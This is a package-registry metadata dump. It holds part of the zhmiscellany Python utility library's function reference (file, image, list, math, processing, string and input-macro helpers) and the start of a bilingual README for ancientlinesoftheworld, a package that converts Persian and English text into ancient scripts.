`zhmiscellany.fileio.chdir_to_script_dir()`
Changes the current working directory to whatever folder the script is in.
#
`zhmiscellany.fileio.cache()`
---
`zhmiscellany.fileio.cache(seed, function)`
Caches the result of a function based on a seed value. Stores and retrieves the cached result from a file.
#
`zhmiscellany.fileio.load_all_cached()`
---
`zhmiscellany.fileio.load_all_cached()`
Loads all cached function results from the cache directory. Raises an exception if nothing is cached.
#
`zhmiscellany.fileio.list_files_recursive()`
---
`zhmiscellany.fileio.list_files_recursive(folder)`
Recursively lists all files in a folder while skipping symlinks and junctions.
#
`zhmiscellany.fileio.list_files_recursive_multiprocessed()`
---
`zhmiscellany.fileio.list_files_recursive_multiprocessed(dir_path, return_folders=False)`
Recursively lists all files in a folder using multiprocessing for efficiency. Optionally returns folder names as well.
#
`zhmiscellany.fileio.list_files_recursive_cache_optimised_multiprocessed()`
---
`zhmiscellany.fileio.list_files_recursive_cache_optimised_multiprocessed(dir_path, show_timings=False, cache_in_temp=True)`
Efficiently lists files recursively using a cache to improve performance. Uses multiprocessing and caching to minimize redundant filesystem access and maximise speed. In testing, it listed the C drive with 1M+ files in 2.0s.
#
`zhmiscellany.fileio.encode_safe_filename()`
---
`zhmiscellany.fileio.encode_safe_filename(s, max_length=16)`
Encodes a string into a short, URL-safe, and filename-safe string. Uses base64 encoding and falls back to an MD5 hash if the result is too long.
#
`zhmiscellany.fileio.save_chunk()`
---
`zhmiscellany.fileio.save_chunk(name, data)`
Saves arbitrary data into a chunk inside a folder defined by the name. Very handy for saving and reloading progress if aggregating large amounts of data.
#
`zhmiscellany.fileio.load_chunks()`
---
`zhmiscellany.fileio.load_chunks(name)`
Loads all the chunks as a list from the folder defined by the name.
#
`zhmiscellany.fileio.clear_chunks()`
---
`zhmiscellany.fileio.clear_chunks(name)`
Deletes all the chunks from the folder defined by the name.
#
`zhmiscellany.fileio.list_drives()`
---
`zhmiscellany.fileio.list_drives()`
Returns a list of all the valid accessible connected drives.
#
---
`zhmiscellany.image`
---
`zhmiscellany.image.image_diff()`
---
`zhmiscellany.image.image_diff(img1, img2)`
Quantify the difference between 2 images, returns a float, lower means less difference.
#
`zhmiscellany.image.Canvas()`
---
`zhmiscellany.image.Canvas(width, height, colour=(0, 0, 0, 255))`
Creates an RGBA image canvas for drawing shapes and text. Uses direct pixel manipulation for precise control.
#
`zhmiscellany.image.Canvas.draw_circle()`
---
`zhmiscellany.image.Canvas.draw_circle(xy, radius, colour)`
Draws a filled circle at the specified coordinates with the given radius and color.
#
`zhmiscellany.image.Canvas.draw_line()`
---
`zhmiscellany.image.Canvas.draw_line(xy, vector, colour)`
Draws a line from the starting point in the direction of the vector.
#
`zhmiscellany.image.Canvas.draw_rectangle()`
---
`zhmiscellany.image.Canvas.draw_rectangle(xy, width, height, colour)`
Draws a rectangle with alpha blending. Supports per-pixel color blending for smooth transparency effects.
#
`zhmiscellany.image.Canvas.draw_pixel()`
---
`zhmiscellany.image.Canvas.draw_pixel(xy, colour)`
Sets the color of a single pixel, ensuring it remains within canvas bounds.
#
`zhmiscellany.image.Canvas.annotate()`
---
`zhmiscellany.image.Canvas.annotate(pixel_xy, text, text_scale=1.0, line_thickness=1, ...)`
Draws text near a specified pixel with an optional connecting line and background. Supports auto-contrast for visibility.
#
`zhmiscellany.image.value_to_color()`
---
`zhmiscellany.image.value_to_color(value, low, high, use_black=True)`
Maps a value within a range to an RGB color gradient from purple to red. Optionally includes black at the low end.
#
`zhmiscellany.image.hilbert_curve()`
---
`zhmiscellany.image.hilbert_curve(size)`
Generates a Hilbert curve covering a square of given size, returning a list of coordinate tuples.
#
---
`zhmiscellany.list`
---
`zhmiscellany.list.subtract_lists()`
---
`zhmiscellany.list.subtract_lists(main_list, *other_lists)`
Subtract some lists from a main list.
#
`zhmiscellany.list.remove_duplicates_by_element()`
---
`zhmiscellany.list.remove_duplicates_by_element(tuple_list, element)`
Removes duplicates from a 2d list, takes an element for what to judge a duplicate by in the sub lists.
#
`zhmiscellany.list.remove_duplicates_by_element()`
---
`zhmiscellany.list.remove_duplicates_by_element(tuple_list, element)`
Removes duplicate tuples from a list based on a specific element index.
#
`zhmiscellany.list.multi_split()`
---
`zhmiscellany.list.multi_split(string_list, splits)`
Splits a list of strings multiple times using a list of delimiters, applying each split sequentially.
#
`zhmiscellany.list.split_into_n_groups()`
---
`zhmiscellany.list.split_into_n_groups(lst, n)`
Splits a list into n sublists, n=3 would be [1, 2, 3, 4] into [[1], [2], [3, 4]]
#
`zhmiscellany.list.split_into_sublists()`
---
`zhmiscellany.list.split_into_sublists(lst, n)`
Splits a list into sublists of size n, n=3 would be [1, 2, 3, 4] into [[1, 2, 3], [4]]
#
`zhmiscellany.list.flatten()`
---
`zhmiscellany.list.flatten(an_iterable)`
Flattens a 2d iterable into a 1d list.
#
---
`zhmiscellany.math`
---
`zhmiscellany.math.calculate_eta()`
---
`zhmiscellany.math.calculate_eta(timestamps, total_timestamps)`
Calculates the ETA of an event by a list of timestamps and an expected total amount of timestamps.
#
`zhmiscellany.math.smart_percentage()`
---
`zhmiscellany.math.smart_percentage(things, total_things)`
Returns a percentage that is automatically rounded to an appropriate amount of decimal points.
#
`zhmiscellany.math.calculate_evenly_spaced_points()`
---
`zhmiscellany.math.calculate_evenly_spaced_points(duration, segments)`
Calculates some evenly spaced numbers out of a larger number, for instance (5, 3) would be [0, 2.5, 5].
#
`zhmiscellany.math.clamp()`
---
`zhmiscellany.math.clamp(value, minimum, maximum)`
Clamps a value between 2 other values, (5, 2, 4) would return 4.
#
`zhmiscellany.math.generate_grid()`
---
`zhmiscellany.math.generate_grid(top_left, bottom_right, rows, cols, int_coords=True, row_major=True)`
Generates a grid of points between two coordinates with optional integer rounding and row-major ordering.
#
`zhmiscellany.math.generate_eased_points()`
---
`zhmiscellany.math.generate_eased_points(p1, p2, num_points)`
Generates interpolated points between two coordinates using an ease-in-out function for smooth transitions.
#
`zhmiscellany.math.generate_linear_points()`
---
`zhmiscellany.math.generate_linear_points(p1, p2, num_points)`
Generates interpolated points between two coordinates using linear spacing.
#
`zhmiscellany.math.round_to_min_digits()`
---
`zhmiscellany.math.round_to_min_digits(number, min_digits=3)`
Rounds a number while ensuring a minimum number of significant digits.
#
---
`zhmiscellany.misc`
---
`zhmiscellany.misc.die()`
---
`zhmiscellany.misc.die()`
Kills the entire program, even if ran in a thread. Often useful.
#
`zhmiscellany.misc.get_actual_screen_resolution()`
---
`zhmiscellany.misc.get_actual_screen_resolution()`
Retrieves the actual screen resolution using the Windows API.
#
`zhmiscellany.misc.focus_window()`
---
`zhmiscellany.misc.focus_window(process_name, interval=0)`
Attempts to bring a window of the specified process into focus, with multiple fallback methods.
#
`zhmiscellany.misc.setup_console_window()`
---
`zhmiscellany.misc.setup_console_window(xy=(0, 0), wh=(400, 100), always_on_top=True)`
Configures the console window position, size, and always-on-top state.
#
`zhmiscellany.misc.show_progress()`
---
`zhmiscellany.misc.show_progress(things, total_things, extra_data="", smart_ratelimit=False, max_prints=1000)`
Displays a progress percentage, with optional smart rate limiting for large iterations.
#
`zhmiscellany.misc.every_nth()`
---
`zhmiscellany.misc.every_nth(number, n)`
Returns True if the number is a multiple of n.
#
`zhmiscellany.misc.smart_every_nth()`
---
`zhmiscellany.misc.smart_every_nth(number, n, total)`
Optimized variant of every_nth, ensuring final iteration is included.
#
`zhmiscellany.misc.calculate_eta()`
---
`zhmiscellany.misc.calculate_eta(timestamps, total_timestamps)`
Estimates time remaining based on timestamps and total expected entries.
#
`zhmiscellany.misc.decide()`
---
`zhmiscellany.misc.decide(options, text)`
Prompts user input constrained to predefined options.
#
`zhmiscellany.misc.import_module_from_path()`
---
`zhmiscellany.misc.import_module_from_path(path, module_name=None)`
Dynamically imports a Python module from a file path.
#
`zhmiscellany.misc.base62_hash()`
---
`zhmiscellany.misc.base62_hash(anything)`
Generates a base62 hash derived from the MD5 hash of the input.
#
`zhmiscellany.misc.md5_int_hash()`
---
`zhmiscellany.misc.md5_int_hash(anything)`
Generates an integer hash from the MD5 hash of the input.
#
`zhmiscellany.misc.high_precision_sleep()`
---
`zhmiscellany.misc.high_precision_sleep(duration)`
Performs precise sleeping using a busy-wait loop for high accuracy.
#
`zhmiscellany.misc.is_admin()`
---
`zhmiscellany.misc.is_admin()`
Checks if the current process is running with administrator privileges.
#
`zhmiscellany.misc.die_on_key()`
---
`zhmiscellany.misc.die_on_key(key="f9", show_message=False)`
Monitors a specific key press to terminate the process. Runs as a background thread.
#
`zhmiscellany.misc.obfuscate_python()`
---
`zhmiscellany.misc.obfuscate_python(python_code_string, do_not_obfuscate_indent_block_comment="# DNO", remove_prints=True, remove_comments=True, add_lines=True, new_line_ratio=10)`
Obfuscates Python code by removing comments, removing prints, and adding specially crafted junk lines that are impossible to remove. The functionality of code is unaffected, but it is rendered completely irreversibly unreadable.
#
`zhmiscellany.misc.time_it()`
---
`zhmiscellany.misc.time_it(action=False, clock=0)`
Measures and prints execution time for a given code section, supporting named timers.
#
`zhmiscellany.misc.here()`
---
`zhmiscellany.misc.here(*args)`
Prints debugging information including variable names, values, file name, and line number.
#
`zhmiscellany.misc.line()`
---
`zhmiscellany.misc.line`
Alias for the here() function, providing debug output.
#
`zhmiscellany.misc.l()`
---
`zhmiscellany.misc.l`
Alias for the here() function, providing debug output.
#
`zhmiscellany.misc.wait_for_vsync()`
---
`zhmiscellany.misc.wait_for_vsync()`
Waits until the next frame is rendered by the Windows window manager, very handy
#
---
`zhmiscellany.netio`
---
`zhmiscellany.netio.download_file()`
---
`zhmiscellany.netio.download_file(url, file_path, ext)`
Downloads a file from a url to a file path, with an ext.
#
`zhmiscellany.netio.resolve_file()`
---
`zhmiscellany.netio.resolve_file(url, destination_folder=".")`
Generates a safe file path for a downloaded file by extracting its name from a URL and ensuring the path length is within limits.
#
`zhmiscellany.netio.generate_headers()`
---
`zhmiscellany.netio.generate_headers(url)`
Creates randomized HTTP headers for a given URL, including Referer and Host fields.
#
`zhmiscellany.netio.is_internet()`
---
`zhmiscellany.netio.is_internet()`
True if there is a working internet connection.
#
---
`zhmiscellany.processing`
---
`zhmiscellany.processing.multiprocess()`
---
`zhmiscellany.processing.multiprocess(target, args=(), max_retries=0, disable_warning=False)`
Runs a single function in a separate process using Ray multiprocessing.
#
`zhmiscellany.processing.synchronous_class_multiprocess()`
---
`zhmiscellany.processing.synchronous_class_multiprocess(cls, *args, disable_warning=False, **kwargs)`
Creates a remote Ray actor instance for a class, allowing parallel execution of class methods.
#
`zhmiscellany.processing.start_daemon()`
---
`zhmiscellany.processing.start_daemon(**kwargs)`
Starts a new daemon thread with the given parameters.
#
`zhmiscellany.processing.batch_multiprocess_threaded()`
---
`zhmiscellany.processing.batch_multiprocess_threaded(targets_and_args, disable_warning=False, killable=False, daemon=False)`
Executes multiple functions in parallel using Ray multiprocessing, and inside a thread as to be non-blocking.
#
`zhmiscellany.processing.multiprocess_threaded()`
---
`zhmiscellany.processing.multiprocess_threaded(target, args=(), disable_warning=False, killable=False, daemon=False)`
Runs a single function in a separate process and inside a thread as to be non-blocking.
#
`zhmiscellany.processing.raw_multiprocess()`
---
`zhmiscellany.processing.raw_multiprocess(func, args=(), fileless=True)`
Runs a function in a separate Python subprocess, capturing output while handling serialization and deserialization.
#
`zhmiscellany.processing.raw_continuous_multiprocess()`
---
`zhmiscellany.processing.raw_continuous_multiprocess(input_class, args=(), fileless=True, cleanup_file=True)`
Runs a class with a continuous output method in a separate subprocess, yielding results as they are produced.
#
`zhmiscellany.processing.batch_multiprocess()`
---
`zhmiscellany.processing.batch_multiprocess(targets_and_args, max_retries=0, expect_crashes=False, disable_warning=False, flatten=False)`
Executes multiple functions in parallel using Ray multiprocessing, with optional retries, crash handling, and fast result list flattening.
#
`zhmiscellany.processing.batch_threading()`
---
`zhmiscellany.processing.batch_threading(targets, max_threads=None, show_errors=True)`
Takes a list of functions and arguments, for instance [(print_numbers_up_to, 8), (print_numbers_up_to, 11)]
It also returns the results of the functions (whatever each function returned) in a list.
#
`zhmiscellany.processing.batch_threading_gen()`
---
`zhmiscellany.processing.batch_threading_gen(targets, max_threads=None, show_errors=True)`
A generator version of the above function that yields results instead of returning a list..
#
`zhmiscellany.processing.dedupe()`
---
`zhmiscellany.processing.dedupe(an_iterable)`
Very efficiently deduplicates an iterable such as a list and returns a list.
#
`zhmiscellany.processing.thread_join_return()`
---
`zhmiscellany.processing.thread_join_return()`
Just a thread, but it returns whatever value was returned by the function inside it when .join() is called so you can use the data.
#
---
`zhmiscellany.string`
---
`zhmiscellany.string.convert_to_base62()`
---
`zhmiscellany.string.convert_to_base62(number)`
Converts an integer to a base 62 number, this means all lower and upper letters, and numbers are used.
#
`zhmiscellany.string.get_universally_unique_string()`
---
`zhmiscellany.string.get_universally_unique_string()`
Returns a universally unique string, even if called directly sequentially. Strings are generated based off of time not randomness, as such it's impossible to get 2 that are the same.
#
`zhmiscellany.string.multi_replace()`
---
`zhmiscellany.string.multi_replace(string, replaces)`
Takes a string and a list of tuples, like (string, [(string1, string2)]) and in this instance replaces string1 in string with string2.
#
`zhmiscellany.string.timestamp_to_time()`
---
`zhmiscellany.string.timestamp_to_time(unix_timestamp)`
Takes a unix timestamp and returns the actual time as a string.
#
`zhmiscellany.string.truncate_string()`
---
`zhmiscellany.string.truncate_string(input_string, max_length)`
Truncates a string to a certain length.
#
`zhmiscellany.string.concatenate_strings_to_length()`
---
`zhmiscellany.string.concatenate_strings_to_length(strings, limit)`
Takes a list of strings and adds them together until adding any more would exceed the limit, then returns the resulting string.
#
`zhmiscellany.string.smart_round()`
---
`zhmiscellany.string.smart_round(number, decimals=0)`
Same as builtin "round" but removes any hanging .0 if it occurs.
#
`zhmiscellany.string.convert_bytes()`
---
`zhmiscellany.string.convert_bytes(size)`
Converts an int of bytes to a string like '8.3MB'.
#
`zhmiscellany.string.decide()`
---
`zhmiscellany.string.decide(options, text)`
Takes a list of options and a description text and makes the user decide between the options.
#
`zhmiscellany.string.filter_chars()`
---
`zhmiscellany.string.filter_chars(input_string, filter_string)`
Filters chars out of one string from a string of filter chars.
#
`zhmiscellany.string.multi_split()`
---
`zhmiscellany.string.multi_split(string, splits)`
`.split`s a string multiple times based on a list of strings to split by.
#
---
`zhmiscellany.macro`
---
`zhmiscellany.macro.click_pixel()`
---
`def click_pixel(x=None, y=None, click_duration=None, right_click=False, middle_click=False, shift=False, ctrl=False, act_start=True, act_end=True, click_end_duration=None, double_click=False, animation_time=None, animation_fps=60, animation_easing=True, relative=False, ensure_movement=True, pre_click_duration=None, pre_click_wiggle=False):`
Simulates a mouse click at a given position using the raw SendInput method for better compatibility across applications. Supports right and middle clicks, modifier keys, and smooth animated movement with easing.
#
`zhmiscellany.macro.press_key()`
---
`zhmiscellany.macro.press_key(vk_code, shift=False, act_start=True, act_end=True, key_hold_time=0)`
Simulates a key press using the raw SendInput method. Supports holding shift and specifying key hold duration.
#
`zhmiscellany.macro.type_string()`
---
`zhmiscellany.macro.type_string(text=None, delay=None, key_hold_time=None, vk_codes=None, combine=False)`
Types a string or virtual key codes using the raw SendInput method. Supports per-character delays, key holding, and combined key presses.
#
`zhmiscellany.macro.scroll()`
---
`zhmiscellany.macro.scroll(amount, delay=None)`
Performs vertical scrolling using the raw SendInput method. Supports smooth scrolling with delay control.
#
`zhmiscellany.macro.get_mouse_xy()`
---
`zhmiscellany.macro.get_mouse_xy()`
Retrieves the current mouse cursor position.
#
`zhmiscellany.macro.KEY_CODES()`
---
`zhmiscellany.macro.KEY_CODES`
Dictionary mapping key names to their virtual key codes for use with press_key and type_string.
#
`zhmiscellany.macro.toggle_function()`
---
`zhmiscellany.macro.toggle_function(func, key='f8', blocking=True)`
Takes a function, like a small looping keyboard macro for a game for example, and puts it on a toggle for the key you set. For example f8 will toggle the macro on and it will start looping, and pressing f8 again will instantly stop the macro until you toggle it on again.
#
`zhmiscellany.macro.better_wait_for()`
---
`zhmiscellany.macro.better_wait_for(key)`
keyboard.wait() requires a clean press of the specified key, and concurrent key states can interfere with this interpretation. This function waits for a debounced press of the specified key, *ignoring concurrent modifier keys*, then unblocks execution.
#
`zhmiscellany.macro.record_actions_to_code()`
---
`zhmiscellany.macro.record_actions_to_code(RECORD_MOUSE_MOVEMENT=False, STOP_KEY='f9')`
Records keyboard and mouse events and generates zhmiscellany.macro code to emulate them, I'm so tired..
#
`zhmiscellany.macro.is_key_pressed_async()`
---
`zhmiscellany.macro.is_key_pressed_async(vk_code)`
See if a key is pressed.
#
`zhmiscellany.macro.press_key_directinput()`
---
`zhmiscellany.macro.press_key_directinput(key, shift=False, act_start=True, act_end=True, key_hold_time=0)`
press key using direct input library
#
---
`zhmiscellany.cpp`
---
`zhmiscellany.cpp.subtract_lists()`
---
`zhmiscellany.cpp.subtract_lists(l1, l2)`
Subtracts l2 from l1 and returns l1. Much faster then any list subtraction possib | text/markdown | zh | imnotgivingmyemailjustaddmeondiscordmydiscordisz_h_@zh.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: Microsoft :: Windows"
] | [] | https://discord.gg/ThBBAuueVJ | null | >=3.6 | [] | [] | [] | [
"pycryptodome>=0",
"discum==1.1.0",
"requests>=0",
"dill>=0",
"numpy>=0",
"keyboard>=0",
"psutil>=0",
"kthread>=0",
"pillow>=0",
"fuzzywuzzy>=0",
"orjson>=0",
"zstandard>=0",
"pyautogui>=0; sys_platform == \"linux\"",
"ray>=0; sys_platform == \"win32\"",
"pywin32>=0; sys_platform == \"win32\"",
"random-header-generator>=0; sys_platform == \"win32\"",
"pydirectinput>=0; sys_platform == \"win32\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/zen-ham/zhmiscellany/issues"
] | twine/6.1.0 CPython/3.11.9 | 2026-02-20T09:37:08.535440 | zhmiscellany-6.5.6-py3-none-any.whl | 173,178 | 51/77/92dbabdbb7054d4f0584778c08f03312a7ccbd66f20c2c3ddfd42f2c2ce0/zhmiscellany-6.5.6-py3-none-any.whl | py3 | bdist_wheel | null | false | f89d4752db155f197cadcbd6560c7825 | 347e4315fb46177965ad305ca29018c1c014790680584521285e015f3a9cf370 | 517792dbabdbb7054d4f0584778c08f03312a7ccbd66f20c2c3ddfd42f2c2ce0 | null | [] | 108 |
2.4 | ancientlinesoftheworld | 4.2.2 | Convert Persian and English text to ancient scripts like Pahlavi, Avestan, Cuneiform, and Manichaean. | # Ancient Scripts Converter
[](https://pepy.tech/projects/ancientlinesoftheworld)
📜 A Python package for converting text to ancient writing systems
## How It Works / نحوه کارکرد
The converter works **character by character** using **mapping dictionaries**.
مبدل به صورت **حرف به حرف** و با استفاده از **دایرهالمعارفهای نگارشی** کار میکند.
# Text Conversion Flow
```
Input Text
│
▼
[Iterate Character by Character]
│
▼
[Check Character Type]
├─ Persian Letter → Persian Mapping Dictionary
├─ English Letter → English Mapping Dictionary
├─ Number → Number Mapping Dictionary
└─ Symbol → Symbol Mapping Dictionary
│
▼
[Convert or Keep Original]
│
▼
Output Text in Ancient Script
```
### Explanation / توضیح مرحله به مرحله:
1. **Character Mapping / نگاشت حروف**
- Each ancient script has its own dictionary mapping **Persian, English, numbers, and symbols**.
هر خط باستانی دارای دیکشنری مخصوص خود است که **حروف فارسی، انگلیسی، اعداد و علائم** را به نمادهای مربوطه تبدیل میکند.
2. **Conversion / تبدیل**
- Iterate through each character of the input text.
- Replace it with the mapped symbol from the dictionary.
- If a character is not found, keep it unchanged.
- هر حرف متن ورودی بررسی میشود، جایگزین نماد متناظر میشود، و اگر در دیکشنری نبود، بدون تغییر باقی میماند.
3. **Supported Types / انواع پشتیبانی شده**
- Persian letters / حروف فارسی
- English letters / حروف انگلیسی
- Numbers / اعداد
- Some punctuation and symbols / برخی علائم نگارشی و سمبلها
4. **Optimized Scripts / خطوط بهینه شده**
- Some scripts like **Linear B** or **Oracle Bone** use optimized mappings for **faster and more accurate conversion**.
برخی خطوط مانند **خط ب یا اوراکل بون** دارای **دایرهالمعارف بهینه** برای تبدیل سریعتر و دقیقتر هستند.
## Installation
```bash
pip install --upgrade ancientlinesoftheworld
```
## Usage
```python
from ancient import AncientScripts
converter = AncientScripts()
# تبدیل متن به خط باستانی میخی
cuneiform_text = converter.cuneiform("سلام")
print(cuneiform_text)
# تبدیل متن به خط باستانی مصری
hieroglyph_text = converter.hieroglyph("خدا")
print(hieroglyph_text)
# تبدیل متن تاریخی اوستایی
avesta = converter.avestan("hiسلام")
print(avesta)
print(c.get_supported_scripts())
brahmi = converter.brahmi ("HI سلام")
print(brahmi)
```
## Project :
```python
from ancient import AncientScripts, AncientTimeline
# ایجاد نمونه از کلاس اصلی
c = AncientScripts()
# ایجاد تایملاین با خط پهلوی
t = AncientTimeline(script='pahlavi')
print("🕊️ Welcome to AncientLinesOfTheWorld 🏛️")
print("=" * 60)
print("🔹 Supported Ancient Scripts:")
for name, desc in c.get_supported_scripts().items():
print(f" - {name:<12} → {desc}")
print("=" * 60)
text = "hi"
print(f"\nOriginal text: {text}\n")
print("🪶 Converted Texts:")
print(f" 🔸 Pahlavi: {c.pahlavi(text)}")
print(f" 🔸 Akkadian: {c.akkadian(text)}")
print(f" 🔸 Avestan: {c.avestan(text)}")
print(f" 🔸 Manichaean: {c.manichaean(text)}")
print(f" 🔸 Linear B: {c.linear_b(text)}")
print(f" 🔸 Hebrew: {c.hebrew(text)}")
print(f" 🔸 Hieroglyph: {c.hieroglyph(text)}")
print(f" 🔸 Sanskrit: {c.sanskrit(text)}")
print(f" 🔸 Oracle Bone: {c.oracle_bone(text)}")
print(f" 🔸 : cuneiform : {c.cuneiform(text)}")
print(f" 🔸 brahmi : {c.brahmi (text)}")
print("\n" + "=" * 60)
# 🕰️ نمایش زمان زنده با خط پهلوی
print("📜 Real-time Ancient Timeline (Pahlavi Script):")
t.show()
print("=" * 60)
print("💫 Powered by AncientLinesOfTheWorld | Created by AmirHossein Kader")
```
## generate image
تولید تصاویر با خطوط باستانی | Generate Images with Ancient Scripts
این کلاس متن شما را به خط باستانی مورد نظر تبدیل کرده و روی یک تصویر پسزمینه قرار میدهد. خروجی نهایی یک تصویر زیبا با متن باستانی است که در پوشه پروژه شما ذخیره میشود
English:
This class converts your text into the desired ancient script and places it on a background image. The final output is a beautiful image with ancient text, saved in your project directory.
⚙️ پارامترهای constructor | Constructor Parameters
پارامتر نوع پیشفرض توضیح
script str "cuneiform" خط باستانی مورد نظر (cuneiform)
log_level int logging.INFO سطح لاگگیری برای دیباگ
پارامتر های ورودی این کلاس:
text =اجباری
متنی که میخواهید به خط باستانی تبدیل شود
output_filename=اختیاری
نام دلخواه برای فایل خروجی. اگر خالی بماند، خودکار ساخته میشود
rtl=اختیاری
اگر True باشد، متن راستبهچپ نوشته میشود
enhance_contrast=اختیاری
اگر True باشد، رنگ متن با توجه به پسزمینه تنظیم میشود
text_color=اختیاری
رنگ دلخواه به صورت RGB. مثال: (255,0,0) برای قرمز
## سادهترین حالت
```python
from ancient import AncientImageGenerator
# ساخت شیء از کلاس و تعیین نوع خط
generator = AncientImageGenerator(script="cuneiform")
# متنی که میخوای تبدیل بشه
text = "تمدن از اینجا آغاز شد"
# تولید تصویر با متن باستانی
output_image = generator.generate_image(text)
print(f"📜 تصویر آماده شد و در این مسیر ذخیره شد:\n{output_image}")
```
## با نام دلوخواه
```python
gen.generate_image(
"متن باستانی",
output_filename="my_ancient_text.png"
)
```
با رنگ طلایی و کنتراست خودکار
```python
gen.generate_image(
"شاهکار تاریخ",
text_color=(255, 215, 0), # طلایی
enhance_contrast=True
)
```
پاک کردن کش های که استفاده شده:
```python
gen.clear_font_cache()
```
رنگهای پرکاربرد | Common Colors:
text_color=(255, 0, 0) # 🔴 قرمز | Red
text_color=(0, 255, 0) # 🟢 سبز | Green
text_color=(0, 0, 255) # 🔵 آبی | Blue
text_color=(255, 255, 0) # 🟡 زرد | Yellow
text_color=(255, 0, 255) # 🟣 بنفش | Magenta
text_color=(0, 255, 255) # 🔷 فیروزهای | Cyan
text_color=(0, 0, 0) # ⚫ مشکی | Black
text_color=(255, 255, 255) # ⚪ سفید | White
text_color=(255, 215, 0) # 🏆 طلایی | Gold
text_color=(192, 192, 192) # ⚪ نقرهای | Silver
text_color=(128, 0, 128) # 🟣 ارغوانی | Purple
text_color=(255, 165, 0) # 🟠 نارنجی | Orange
# AncientTimeline
کلاس `AncientTimeline` برای **نمایش زمان فعلی به خطوط باستانی** (میخی، پهلوی، منیایی، هیروگلیف، اکدی، اوراکل بون، اوستایی) طراحی شده است.
### ⚙️ پارامترها
| پارامتر | نوع | توضیح |
|---------|-----|-------|
| `script` | `str` | خط باستانی برای نمایش (`'cuneiform'`, `'pahlavi'`, `'manichaean'`, `'hieroglyph'`, `'akkadian'`, `'oracle_bone'`, `'avestan'`) |
| `ancient_format` | `bool` | اگر `True` باشد، تاریخ به سبک باستانی نمایش داده میشود |
### 🖥️ نمونه استفاده
# 🏺 AncientTimeline
کلاس `AncientTimeline` برای **نمایش زمان فعلی به خطوط باستانی** (میخی، پهلوی، منیایی، هیروگلیف، اکدی، اوراکل بون، اوستایی) طراحی شده است.
### ⚙️ پارامترها
| پارامتر | نوع | توضیح |
|---------|-----|-------|
| `script` | `str` | خط باستانی برای نمایش (`'cuneiform'`, `'pahlavi'`, `'manichaean'`, `'hieroglyph'`, `'akkadian'`, `'oracle_bone'`, `'avestan'`) |
| `ancient_format` | `bool` | اگر `True` باشد، تاریخ به سبک باستانی نمایش داده میشود |
### 🖥️ نمونه استفاده
```python
from ancient import AncientTimeline
timeline = AncientTimeline(script='pahlavi', ancient_format=True)
print(timeline.as_text()) # دریافت زمان فعلی به صورت متن
timeline.show() # نمایش زمان روی کنسول
```
## 🔑 پیشنیاز
برای استفاده از این کلاس شما نیاز دارید:
1. ثبتنام در لیارا و دریافت **API Key**:
[https://console.liara.ir/ai](https://console.liara.ir/ai)
## AncientScriptAI :
| پارامتر | نوع | توضیح |
| --------------------- | ------ | ------------------------------------------------------------------- |
| `user_input` | `str` | متن ورودی کاربر که میخواید به زبان باستانی پاسخ داده شود |
| `script` | `str` | زبان باستانی هدف (یکی از `SUPPORTED_SCRIPTS`) |
| `include_translation` | `bool` | اگر `True` باشد، خروجی شامل **ترجمه فارسی و انگلیسی** نیز خواهد بود |
```python
from ancient import AncientScriptAI
# وارد کردن توکن API خود
api_key = ""
ai_bot = AncientScriptAI(api_key=api_key,ase_url= "https://ai.liara.ir/api/v1/<>")
# متن ورودی کاربر
text = "سلام باستانی"
script = "cuneiform"
# گرفتن پاسخ AI
response = ai_bot.get_ancient_response(text, script)
print(response)
```
## AncientAnimator
AncientAnimator converts input text into ancient scripts and displays the result as an
animated, character-by-character output.
It simulates real-time writing by rendering each character with a configurable delay.
The animation can be shown directly in the terminal or streamed through a callback function,
making it suitable for CLI tools, GUI applications, and web-based environments.
---
AncientAnimator متن ورودی را به خطهای باستانی تبدیل کرده و خروجی را بهصورت انیمیشنی،
کاراکتر به کاراکتر نمایش میدهد.
این کلاس فرآیند «نوشتن تدریجی» را شبیهسازی میکند و میتواند خروجی را مستقیماً در ترمینال
نمایش دهد یا از طریق یک تابع callback در GUI یا وب استفاده شود.
---
## Parameters | پارامترها
- **text**
- English: Input text to be converted
- فارسی: متن ورودی برای تبدیل
- **script**
- English: Target ancient script
- فارسی: خط باستانی مقصد
- **delay**
- English: Delay between each character (in seconds)
- فارسی: تأخیر بین هر کاراکتر (بر حسب ثانیه)
- **output_func**
- English: Optional callback function for receiving animated output step-by-step
- فارسی: تابع callback اختیاری برای دریافت خروجی انیمیشنی بهصورت مرحلهای
---
## Example – Terminal | مثال – ترمینال
```python
from ancient import AncientAnimator
animator = AncientAnimator(delay=0.1)
animator.run(
text="Hello World",
script="pahlavi"
)
```
## Example – Callback | مثال – با Callback
```python
from ancient import AncientAnimator
def output_callback(chunk: str):
print(chunk)
animator = AncientAnimator(delay=0.05)
animator.run(
text="HI",
script="cuneiform",
output_func=output_callback
)
```
## Supported Scripts
- Cuneiform
- Egyptian Hieroglyphs
- Pahlavi script
- Manichaean script
- Linear B
-avestan
-brahmi
-
- And more...
# 🌐 بخش WebApp — کلاس `AncientWeb`
کلاس **`AncientWeb`** یکی از قابلیتهای منحصربهفرد کتابخانه `ancientlinesoftheworld` است.
این کلاس یک **وباپلیکیشن لوکال** فراهم میکند که به شما اجازه میدهد متنها را به **خطوط باستانی** تبدیل کنید، بدون نیاز به هاست یا سرور خارجی.
---
## 🎯 وظیفه کلاس
- اجرای خودکار یک **وباپ Flask** روی سیستم شما
- نمایش رابط کاربری ساده و کاربرپسند
- پشتیبانی از **تمام خطوط باستانی موجود در کتابخانه**
- امکان استفاده آفلاین و لوکال
- مناسب برای تست، دمو یا استفاده شخصی و آموزشی
---
## 🚀 نمونه استفاده
```python
from ancient import AncientWeb
# ایجاد نمونه کلاس
app = AncientWeb(version="2.5.0")
# اجرای وباپ لوکال
app.run_app()
```
## لیست کلاسهای کتابخانه و قابلیتهای آنها:
AncientScripts – تبدیل متن به خطوط باستانی مختلف
AncientTimeline – نمایش زمان فعلی به فرمت باستانی (میخی، پهلوی، اوستایی و …)
AncientImageGenerator – تولید تصاویر مرتبط با خطوط باستانی و طرحهای تاریخی
AncientScriptAI – پردازش و تولید محتوای هوشمند با خطوط باستانی
AncientWeb – ابزارهای وب برای نمایش خطوط باستانی
AncientAnimator - نشان خطوط باستانی به انیمیشن
AncientReverseAI - تبدیل متن باستانی به حروف فارسی وانگلیسی
## 🔁 AncientReverseAI
### AI-Powered Ancient Script → Persian & English Translator
### مبدل هوشمند خطوط باستانی به فارسی و انگلیسی
`AncientReverseAI` is an advanced and **unique AI-based module** designed to translate
**ancient scripts into meaningful Persian and English text**.
